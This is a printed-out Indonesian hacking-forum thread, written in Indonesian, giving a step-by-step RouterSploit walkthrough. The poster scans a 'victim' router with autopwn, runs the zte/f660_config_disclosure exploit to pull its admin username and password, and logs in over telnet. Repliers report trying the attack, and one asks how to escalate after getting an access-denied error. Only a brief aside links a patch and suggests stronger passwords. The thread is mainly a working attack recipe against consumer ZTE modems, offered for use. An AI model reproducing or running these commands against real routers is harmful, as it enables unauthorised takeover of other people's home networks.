Indonesian Back|Track Team
Share Exploit Router with RouterSploit - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+--- Thread: Share Exploit Router with RouterSploit (/thread-6812.html)

Pages: 1 2 3

Exploit Router with RouterSploit - tong - 05-26-2016

Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.

Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routersploit#installation-on-ubuntu-1604

Installation
Code:
git clone https://github.com/reverse-shell/routersploit

Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Spoiler! :
[Image: eiusx.png]

Usage
Code:
python rsf.py
use scanners/autopwn
set target "ip victim"
Spoiler! :
[Image: pjIFw.png]

kemudian jalankan module
Code:
run
Spoiler! :
[Image: rZ1ea.png]

Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure

Code:
use exploits/zte/f660_config_disclosure
set target "ip victim"
run
Spoiler! :
[Image: mKAtx.png]

wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router Smile
Code:
telnet "ip victim"
Spoiler! :
[Image: bnpYF.png]

wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok

Update
Code:
cd routersploit
git pull

Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat Smile

source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_

RE: Exploit Router with RouterSploit - Abdul Khaliq - 05-26-2016

Izin coba exploitnya tong,, hahahaha

RE: Exploit Router with RouterSploit - tong - 05-26-2016

(05-26-2016, 09:47 PM)Abdul Khaliq Wrote: Izin coba exploitnya tong,, hahahaha

monggo om, ijo ijo seikhlasnya om Smile

RE: Exploit Router with RouterSploit - Maesashi Sanichirei - 05-27-2016

thanks you abg otong :v
ane test juga

RE: Exploit Router with RouterSploit - ugly_clown - 05-27-2016

ane udah masuk ke telnet nya nih bang,
tapi ane coba bikin file disitu ternyata Access denied
solusinya biar enggak access denied gimana ya bang?

RE: Exploit Router with RouterSploit - BabyFAce - 05-27-2016

MANTAPP

RE: Exploit Router with RouterSploit - Naufal Fajri - 05-27-2016

Nice Tong Big Grin

keep sharing tong

RE: Exploit Router with RouterSploit - devilscream_ - 05-28-2016

ZTE F6XX (modem indihome,dkk) rata2 vuln ama exploit ini.

ini buat yang mau amanin / patching routernya
https://github.com/devilscream/zte-patch

tutorialnya udah ada Smile simple kok

RE: Exploit Router with RouterSploit - tong - 05-29-2016

(05-27-2016, 08:54 AM)ugly_clown Wrote: ane udah masuk ke telnet nya nih bang,
tapi ane coba bikin file disitu ternyata Access denied
solusinya biar enggak access denied gimana ya bang?

pnyebab access denied bisa jadi situ cuma login sbagai guest (tamu), yg hanya bisa melhat, tanpa bisa merubah
solusinya harus bisa dpetin hak aksesnya om, atau bisa baca disini tentang permissions https://en.wikipedia.org/wiki/File_system_permissions

(05-28-2016, 12:24 AM)devilscream_ Wrote: ZTE F6XX (modem indihome,dkk) rata2 vuln ama exploit ini.

ini buat yang mau amanin / patching routernya
https://github.com/devilscream/zte-patch

tutorialnya udah ada Smile simple kok

sbernya buat amanin routernya ckup gnti user am pass ke yg lbih strong, cntohnya sperti penambahan karakter simbol, dan angka
btw toolsnya kren om, ane tambahin ke thread ye Big Grin

RE: Exploit Router with RouterSploit - Rues_96 - 06-03-2016

ane stuck di sini om
ImportError: No module named cryptography.hazmat.backends
Spoiler! :
[Image: 33y2ycp.png]